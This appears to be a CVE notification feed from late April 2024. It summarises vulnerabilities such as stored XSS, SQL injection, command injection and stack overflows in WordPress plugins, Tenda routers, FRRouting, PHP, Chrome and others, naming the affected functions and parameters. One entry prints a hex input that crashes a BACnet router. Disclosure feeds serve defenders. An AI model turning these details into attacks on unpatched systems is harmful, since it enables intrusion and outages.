🚨 CVE-2023-41728Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rescue Themes Rescue Shortcodes allows Stored XSS.This issue affects Rescue Shortcodes: from n/a through 2.5.🎖@cveNotify |
|
| 2024-04-29 09:37:25 |
🚨 CVE-2021-36821Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Forminator – Contact Form, Payment Form & Custom Form Builder allows Stored XSS.This issue affects Forminator – Contact Form, Payment Form & Custom Form Builder: from n/a through 1.14.11.🎖@cveNotify |
|
| 2024-04-29 09:37:24 |
🚨 CVE-2021-36823Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cusmin AGCA - Absolutely Glamorous Custom Admin (WordPress plugin) allows Stored XSS.This issue affects AGCA - Absolutely Glamorous Custom Admin (WordPress plugin): from n/a through 6.8.🎖@cveNotify |
|
| 2024-04-29 08:37:37 |
🚨 CVE-2024-33652Missing Authorization vulnerability in Real Big Plugins Client Dash.This issue affects Client Dash: from n/a through 2.2.1.🎖@cveNotify |
|
| 2024-04-29 08:37:34 |
🚨 CVE-2024-33641Deserialization of Untrusted Data vulnerability in Team Yoast Custom field finder.This issue affects Custom field finder: from n/a through 0.3.🎖@cveNotify |
|
| 2024-04-29 08:37:33 |
🚨 CVE-2024-33637Insertion of Sensitive Information into Log File vulnerability in Solid Plugins Solid Affiliate.This issue affects Solid Affiliate: from n/a through 1.9.1.🎖@cveNotify |
|
| 2024-04-29 08:37:32 |
🚨 CVE-2024-33629Server-Side Request Forgery (SSRF) vulnerability in Creative Motion Auto Featured Image (Auto Post Thumbnail).This issue affects Auto Featured Image (Auto Post Thumbnail): from n/a through 4.0.0.🎖@cveNotify |
|
| 2024-04-29 08:37:31 |
🚨 CVE-2024-33627Server-Side Request Forgery (SSRF) vulnerability in Cusmin Absolutely Glamorous Custom Admin.This issue affects Absolutely Glamorous Custom Admin: from n/a through 7.2.2.🎖@cveNotify |
|
| 2024-04-29 08:37:27 |
🚨 CVE-2024-33566Missing Authorization vulnerability in N-Media OrderConvo allows OS Command Injection.This issue affects OrderConvo: from n/a through 12.4.🎖@cveNotify |
|
| 2024-04-29 08:37:26 |
🚨 CVE-2024-33538Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Fastline Media LLC Assistant – Every Day Productivity Apps.This issue affects Assistant – Every Day Productivity Apps: from n/a through 1.4.9.1.🎖@cveNotify |
|
| 2024-04-29 07:37:31 |
🚨 CVE-2024-3195A vulnerability was found in MailCleaner up to 2023.03.14. It has been classified as critical. This affects an unknown part of the component Admin Endpoints. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-262311.🎖@cveNotify |
|
| 2024-04-29 07:37:30 |
🚨 CVE-2024-3193A vulnerability has been found in MailCleaner up to 2023.03.14 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Admin Endpoints. The manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-262309 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-29 07:37:29 |
🚨 CVE-2024-3192A vulnerability, which was classified as problematic, was found in MailCleaner up to 2023.03.14. Affected is an unknown function of the component Admin Interface. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-262308.🎖@cveNotify |
|
| 2024-04-29 07:37:26 |
🚨 CVE-2024-33546Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team WZone allows SQL Injection.This issue affects WZone: from n/a through 14.0.10.🎖@cveNotify |
|
| 2024-04-29 07:37:25 |
🚨 CVE-2024-1300A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.🎖@cveNotify |
|
| 2024-04-29 07:37:24 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-04-29 06:37:43 |
🚨 CVE-2024-33904In plugins/HookSystem.cpp in Hyprland through 0.39.1 (before 28c8561), through a race condition, a local attacker can cause execution of arbitrary assembly code by writing to a predictable temporary file.🎖@cveNotify |
|
| 2024-04-29 06:37:42 |
🚨 CVE-2024-33681Cross-Site Request Forgery (CSRF) vulnerability in Sandor Kovacs Regenerate post permalink allows Cross-Site Scripting (XSS).This issue affects Regenerate post permalink: from n/a through 1.0.3.🎖@cveNotify |
|
| 2024-04-29 06:37:41 |
🚨 CVE-2024-33632Cross-Site Request Forgery (CSRF) vulnerability in Piotnet Piotnet Addons For Elementor Pro.This issue affects Piotnet Addons For Elementor Pro: from n/a through 7.1.17.🎖@cveNotify |
|
| 2024-04-29 06:37:38 |
🚨 CVE-2024-33631Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor Pro allows Stored XSS.This issue affects Piotnet Addons For Elementor Pro: from n/a through 7.1.17.🎖@cveNotify |
|
| 2024-04-29 06:37:37 |
🚨 CVE-2024-33571Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infomaniak Staff VOD Infomaniak allows Reflected XSS.This issue affects VOD Infomaniak: from n/a through 1.5.6.🎖@cveNotify |
|
| 2024-04-29 06:37:36 |
🚨 CVE-2024-33559Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.🎖@cveNotify |
|
| 2024-04-29 06:37:32 |
🚨 CVE-2024-33551Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore Core allows SQL Injection.This issue affects XStore Core: from n/a through 5.3.5.🎖@cveNotify |
|
| 2024-04-29 06:37:31 |
🚨 CVE-2024-33542Authorization Bypass Through User-Controlled Key vulnerability in Fabio Rinaldi Crelly Slider.This issue affects Crelly Slider: from n/a through 1.4.5.🎖@cveNotify |
|
| 2024-04-29 06:37:30 |
🚨 CVE-2024-33540Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGrill ColorNews allows Stored XSS.This issue affects ColorNews: from n/a through 1.2.6.🎖@cveNotify |
|
| 2024-04-29 06:37:26 |
🚨 CVE-2024-33537Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Theme Horse WP Portfolio allows Stored XSS.This issue affects WP Portfolio: from n/a through 2.4.🎖@cveNotify |
|
| 2024-04-29 06:37:25 |
🚨 CVE-2024-1905The Smart Forms WordPress plugin before 2.6.96 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-29 06:37:24 |
🚨 CVE-2023-52723In KDE libksieve before 23.03.80, kmanagesieve/session.cpp places a cleartext password in server logs because a username variable is accidentally given a password value.🎖@cveNotify |
|
| 2024-04-29 04:37:33 |
🚨 CVE-2024-4300E-WEBInformationCo. FS-EZViewer(Web) exposes sensitive information in the service. A remote attacker can obtain the database configuration file path through the webpage source code without login. Accessing this path allows attacker to obtain the database credential with the highest privilege and database host IP address. With this information, attackers can connect to the database and perform actions such as adding, modifying, or deleting database contents.🎖@cveNotify |
|
| 2024-04-29 04:37:29 |
🚨 CVE-2024-3096In PHP version 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, if a password stored with password_hash() starts with a null byte (\x00), testing a blank string as the password via password_verify() will incorrectly return true.🎖@cveNotify |
|
| 2024-04-29 04:37:28 |
🚨 CVE-2024-2756Due to an incomplete fix to CVE-2022-31629 https://github.com/advisories/GHSA-c43m-486j-j32p , network and same-site attackers can set a standard insecure cookie in the victim's browser which is treated as a __Host- or __Secure- cookie by PHP applications.🎖@cveNotify |
|
| 2024-04-29 04:37:27 |
🚨 CVE-2024-1874In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.🎖@cveNotify |
|
| 2024-04-29 03:37:46 |
🚨 CVE-2024-4298The email search interface of HGiga iSherlock (including MailSherlock, SpamSherock, AuditSherlock) fails to filter special characters in certain function parameters, allowing remote attackers with administrative privileges to exploit this vulnerability for Command Injection attacks, enabling execution of arbitrary system commands.🎖@cveNotify |
|
| 2024-04-29 03:37:45 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2024-04-29 03:37:44 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-04-29 02:37:24 |
🚨 CVE-2024-4296The account management interface of HGiga iSherlock (including MailSherlock, SpamSherlock, AuditSherlock) fails to filter special characters in certain function parameters, allowing remote attackers with administrative privileges to exploit this vulnerability to download arbitrary system files.🎖@cveNotify |
|
| 2024-04-29 01:37:24 |
🚨 CVE-2024-33903In CARLA through 0.9.15.2, the collision sensor mishandles some situations involving pedestrians or bicycles, in part because the collision sensor function is not exposed to the Blueprint library.🎖@cveNotify |
|
| 2024-04-29 00:37:24 |
🚨 CVE-2024-33899RARLAB WinRAR before 7.00, on Linux and UNIX platforms, allows attackers to spoof the screen output, or cause a denial of service, via ANSI escape sequences.🎖@cveNotify |
|
| 2024-04-28 22:37:24 |
🚨 CVE-2024-31309HTTP/2 CONTINUATION DoS attack can cause Apache Traffic Server to consume more resources on the server. Version from 8.0.0 through 8.1.9, from 9.0.0 through 9.2.3 are affected.Users can set a new setting (proxy.config.http2.max_continuation_frames_per_minute) to limit the number of CONTINUATION frames per minute. ATS does have a fixed amount of memory a request can use and ATS adheres to these limits in previous releases.Users are recommended to upgrade to versions 8.1.10 or 9.2.4 which fixes the issue.🎖@cveNotify |
|
| 2024-04-28 20:37:24 |
🚨 CVE-2024-22119The cause of vulnerability is improper validation of form input field “Name” on Graph page in Items section.🎖@cveNotify |
|
| 2024-04-28 16:37:25 |
🚨 CVE-2024-33883The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.🎖@cveNotify |
|
| 2024-04-28 12:37:24 |
🚨 CVE-2024-26605In the Linux kernel, the following vulnerability has been resolved:PCI/ASPM: Fix deadlock when enabling ASPMA last minute revert in 6.7-final introduced a potential deadlock whenenabling ASPM during probe of Qualcomm PCIe controllers as reported bylockdep: ============================================ WARNING: possible recursive locking detected 6.7.0 #40 Not tainted -------------------------------------------- kworker/u16:5/90 is trying to acquire lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pcie_aspm_pm_state_change+0x58/0xdc but task is already holding lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pci_walk_bus+0x34/0xbc other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(pci_bus_sem); lock(pci_bus_sem); *** DEADLOCK *** Call trace: print_deadlock_bug+0x25c/0x348 __lock_acquire+0x10a4/0x2064 lock_acquire+0x1e8/0x318 down_read+0x60/0x184 pcie_aspm_pm_state_change+0x58/0xdc pci_set_full_power_state+0xa8/0x114 pci_set_power_state+0xc4/0x120 qcom_pcie_enable_aspm+0x1c/0x3c [pcie_qcom] pci_walk_bus+0x64/0xbc qcom_pcie_host_post_init_2_7_0+0x28/0x34 [pcie_qcom]The deadlock can easily be reproduced on machines like the Lenovo ThinkPadX13s by adding a delay to increase the race window during asynchronousprobe where another thread can take a write lock.Add a new pci_set_power_state_locked() and associated helper functions thatcan be called with the PCI bus semaphore held to avoid taking the read locktwice.🎖@cveNotify |
|
| 2024-04-28 07:37:38 |
🚨 CVE-2024-31948In FRRouting (FRR) through 9.1, an attacker using a malformed Prefix SID attribute in a BGP UPDATE packet can cause the bgpd daemon to crash.🎖@cveNotify |
|
| 2024-04-28 07:37:37 |
🚨 CVE-2023-38407bgpd/bgp_label.c in FRRouting (FRR) before 8.5 attempts to read beyond the end of the stream during labeled unicast parsing.🎖@cveNotify |
|
| 2024-04-28 07:37:36 |
🚨 CVE-2023-38406bgpd/bgp_flowspec.c in FRRouting (FRR) before 8.4.3 mishandles an nlri length of zero, aka a "flowspec overflow."🎖@cveNotify |
|
| 2024-04-28 07:37:32 |
🚨 CVE-2023-47235An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when a malformed BGP UPDATE message with an EOR is processed, because the presence of EOR does not lead to a treat-as-withdraw outcome.🎖@cveNotify |
|
| 2024-04-28 07:37:31 |
🚨 CVE-2023-46752An issue was discovered in FRRouting FRR through 9.0.1. It mishandles malformed MP_REACH_NLRI data, leading to a crash.🎖@cveNotify |
|
| 2024-04-28 07:37:30 |
🚨 CVE-2022-37035An issue was discovered in bgpd in FRRouting (FRR) 8.3. In bgp_notify_send_with_data() and bgp_process_packet() in bgp_packet.c, there is a possible use-after-free due to a race condition. This could lead to Remote Code Execution or Information Disclosure by sending crafted BGP packets. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-28 07:37:26 |
🚨 CVE-2022-26128A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to a wrong check on the input packet length in the babel_packet_examin function in babeld/message.c.🎖@cveNotify |
|
| 2024-04-28 07:37:25 |
🚨 CVE-2022-26126Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to the use of strdup with a non-zero-terminated binary string in isis_nb_notifications.c.🎖@cveNotify |
|
| 2024-04-28 07:37:24 |
🚨 CVE-2022-26125Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the input packet length in isisd/isis_tlvs.c.🎖@cveNotify |
|
| 2024-04-28 03:37:31 |
🚨 CVE-2024-3914Use after free in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-28 03:37:30 |
🚨 CVE-2024-3845Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass mixed content policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-28 03:37:26 |
🚨 CVE-2024-3841Insufficient data validation in Browser Switcher in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to inject scripts or HTML into a privileged page via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-28 03:37:25 |
🚨 CVE-2024-3839Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-28 03:37:24 |
🚨 CVE-2024-3833Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-28 00:37:24 |
🚨 CVE-2023-52722An issue was discovered in Artifex Ghostscript through 10.01.0. psi/zmisc1.c, when SAFER mode is used, allows eexec seeds other than the Type 1 standard.🎖@cveNotify |
|
| 2024-04-27 23:37:25 |
🚨 CVE-2024-4294A vulnerability, which was classified as critical, has been found in PHPGurukul Doctor Appointment Management System 1.0. Affected by this issue is some unknown functionality of the file /doctor/view-appointment-detail.php. The manipulation of the argument editid leads to improper control of resource identifiers. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-262226 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-27 23:37:24 |
🚨 CVE-2022-48684An issue was discovered in Logpoint before 7.1.1. Template injection was seen in the search template. The search template uses jinja templating for generating dynamic data. This could be abused to achieve code execution. Any user with access to create a search template can leverage this to execute code as the loginspect user.🎖@cveNotify |
|
| 2024-04-27 22:37:25 |
🚨 CVE-2024-4293A vulnerability classified as problematic was found in PHPGurukul Doctor Appointment Management System 1.0. Affected by this vulnerability is an unknown functionality of the file appointment-bwdates-reports-details.php. The manipulation of the argument fromdate/todate leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262225 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-27 22:37:24 |
🚨 CVE-2024-33851phpecc, as used in paragonie/phpecc before 2.0.1, has a branch-based timing leak in Point addition. (This is related to phpecc/phpecc on GitHub, and the Matyas Danter ECC library.)🎖@cveNotify |
|
| 2024-04-27 21:37:24 |
🚨 CVE-2024-4292A vulnerability classified as critical has been found in Contemporary Controls BASrouter BACnet BASRT-B 2.7.2. Affected is an unknown function of the component Device-Communication-Control Service. The manipulation with the input 55ff0500370015f30104025506110afb7519035d0841e4bece257b6acfc71f leads to denial of service. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-262224. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 20:37:26 |
🚨 CVE-2024-4291A vulnerability was found in Tenda A301 15.13.08.12_multi_TDE01. It has been rated as critical. This issue affects the function formAddMacfilterRule of the file /goform/setBlackRule. The manipulation of the argument deviceList leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-262223. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 18:37:24 |
🚨 CVE-2023-51704An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights.🎖@cveNotify |
|
| 2024-04-27 15:37:24 |
🚨 CVE-2024-4255A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240419. This issue affects some unknown processing of the file /view/network Config/GRE/gre_edit_commit.php. The manipulation of the argument name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262145 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-27 14:37:24 |
🚨 CVE-2024-4252A vulnerability classified as critical has been found in Tenda i22 1.0.0.3(4687). This affects the function formSetUrlFilterRule. The manipulation of the argument groupIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-262143. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 13:37:24 |
🚨 CVE-2024-4251A vulnerability was found in Tenda i21 1.0.0.14(4656). It has been rated as critical. Affected by this issue is the function fromDhcpSetSer of the file /goform/DhcpSetSe. The manipulation of the argument dhcpStartIp/dhcpEndIp/dhcpGw/dhcpMask/dhcpLeaseTime/dhcpDns1/dhcpDns2 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-262142 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 12:37:26 |
🚨 CVE-2024-4250A vulnerability was found in Tenda i21 1.0.0.14(4656). It has been declared as critical. Affected by this vulnerability is the function formwrlSSIDset of the file /goform/wifiSSIDset. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262141 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 12:37:25 |
🚨 CVE-2024-4249A vulnerability was found in Tenda i21 1.0.0.14(4656). It has been classified as critical. Affected is the function formwrlSSIDget of the file /goform/wifiSSIDget. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-262140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 12:37:24 |
🚨 CVE-2024-25048IBM MQ Appliance 9.3 CD and LTS are vulnerable to a heap-based buffer overflow, caused by improper bounds checking. A remote authenticated attacker could overflow a buffer and execute arbitrary code on the system or cause the server to crash. IBM X-Force ID: 283137.🎖@cveNotify |
|
| 2024-04-27 11:37:24 |
🚨 CVE-2024-4248A vulnerability was found in Tenda i21 1.0.0.14(4656) and classified as critical. This issue affects the function formQosManage_user. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-262139. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 10:37:25 |
🚨 CVE-2024-4247A vulnerability has been found in Tenda i21 1.0.0.14(4656) and classified as critical. This vulnerability affects the function formQosManage_auto. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. VDB-262138 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 10:37:24 |
🚨 CVE-2024-3309The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Widget's attributes in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-27 09:37:27 |
🚨 CVE-2024-4246A vulnerability, which was classified as critical, was found in Tenda i21 1.0.0.14(4656). This affects the function formQosManageDouble_auto. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The identifier VDB-262137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 09:37:26 |
🚨 CVE-2024-3342The Timetable and Event Schedule by MotoPress plugin for WordPress is vulnerable to SQL Injection via the 'events' attribute of the 'mp-timetable' shortcode in all versions up to, and including, 2.4.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-04-27 09:37:25 |
🚨 CVE-2023-1000A vulnerability was found in cyanomiko dcnnt-py up to 0.9.0. It has been classified as critical. Affected is the function main of the file dcnnt/plugins/notifications.py of the component Notification Handler. The manipulation leads to command injection. It is possible to launch the attack remotely. Upgrading to version 0.9.1 is able to address this issue. The patch is identified as b4021d784a97e25151a5353aa763a741e9a148f5. It is recommended to upgrade the affected component. VDB-262230 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-27 08:37:24 |
🚨 CVE-2024-4245A vulnerability, which was classified as critical, has been found in Tenda i21 1.0.0.14(4656). Affected by this issue is the function formQosManageDouble_user. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The identifier of this vulnerability is VDB-262136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-27 05:37:24 |
🚨 CVE-2024-32405Cross Site Scripting vulnerability in inducer relate before v.2024.1 allows a remote attacker to escalate privileges via a crafted payload to the Answer field of InlineMultiQuestion parameter on Exam function.🎖@cveNotify |
|
| 2024-04-27 04:37:25 |
🚨 CVE-2024-2838The WPC Composite Products for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wooco_components[0][name]' parameter in all versions up to, and including, 7.2.7 due to insufficient input sanitization and output escaping and missing authorization on the ajax_save_components function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-27 04:37:24 |
🚨 CVE-2024-2258The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name autofilled into forms in all versions up to, and including, 1.15.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-27 01:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-04-27 00:37:24 |
🚨 CVE-2024-2859By default, SANnav OVA is shipped with root user login enabled. While protected by a password, access to root could expose SANnav to a remote attacker should they gain access to the root account.🎖@cveNotify |
|
| 2024-04-26 23:37:24 |
🚨 CVE-2024-29963Brocade SANnav OVA before v2.3.1, and v2.3.0a, contain hardcoded TLS keys used by Docker. Note: Brocade SANnav doesn't have access to remote Docker registries.🎖@cveNotify |
|
| 2024-04-26 22:37:36 |
🚨 CVE-2024-4244A vulnerability classified as critical was found in Tenda W9 1.0.0.7(4456). Affected by this vulnerability is the function fromDhcpSetSer of the file /goform/DhcpSetSer. The manipulation of the argument dhcpStartIp/dhcpEndIp/dhcpGw/dhcpMask/dhcpLeaseTime/dhcpDns1/dhcpDns2 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-262135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 22:37:32 |
🚨 CVE-2024-3051Malformed Device Reset Locally command classes can be sent to temporarily deny service to an end device. Any frames sent by the end device will not be acknowledged by the gateway during this time.🎖@cveNotify |
|
| 2024-04-26 22:37:31 |
🚨 CVE-2024-31741Cross Site Scripting vulnerability in MiniCMS v.1.11 allows a remote attacker to run arbitrary code via crafted string in the URL after login.🎖@cveNotify |
|
| 2024-04-26 22:37:27 |
🚨 CVE-2024-30804An issue discovered in the DeviceIoControl component in ASUS Fan_Xpert before v.10013 allows an attacker to execute arbitrary code via crafted IOCTL requests.🎖@cveNotify |
|
| 2024-04-26 22:37:26 |
🚨 CVE-2022-29622An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability.🎖@cveNotify |
|
| 2024-04-26 21:37:32 |
🚨 CVE-2024-4241A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. This vulnerability affects the function formQosManageDouble_auto. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The identifier of this vulnerability is VDB-262132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 21:37:31 |
🚨 CVE-2024-4239A vulnerability was found in Tenda AX1806 1.0.0.1 and classified as critical. Affected by this issue is the function formSetRebootTimer of the file /goform/SetRebootTimer. The manipulation of the argument rebootTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-262130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 21:37:30 |
🚨 CVE-2024-32887Sidekiq is simple, efficient background processing for Ruby. Sidekiq is reflected XSS vulnerability. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc. This issue has been patched in version 7.2.4.🎖@cveNotify |
|
| 2024-04-26 21:37:27 |
🚨 CVE-2024-32883MCUboot is a secure bootloader for 32-bits microcontrollers. MCUboot uses a TLV (tag-length-value) structure to represent the meta data associated with an image. The TLVs themselves are divided into two sections, a protected and an unprotected section. The protected TLV entries are included as part of the image signature to avoid tampering. However, the code does not distinguish which TLV entries should be protected or not, so it is possible for an attacker to add unprotected TLV entries that should be protected. Currently, the primary protected TLV entries should be the dependency indication, and the boot record. An injected dependency value would primarily result in an otherwise acceptable image being rejected. A boot record injection could allow fields in a later attestation record to include data not intended, which could cause an image to appear to have properties that it should not have. As a workaround, disable the boot record functionality.🎖@cveNotify |
|
| 2024-04-26 21:37:26 |
🚨 CVE-2024-32878Llama.cpp is LLM inference in C/C++. There is a use of uninitialized heap variable vulnerability in gguf_init_from_file, the code will free this uninitialized variable later. In a simple POC, it will directly cause a crash. If the file is carefully constructed, it may be possible to control this uninitialized value and cause arbitrary address free problems. This may further lead to be exploited. Causes llama.cpp to crash (DoS) and may even lead to arbitrary code execution (RCE). This vulnerability has been patched in commit b2740.🎖@cveNotify |
|
| 2024-04-26 21:37:25 |
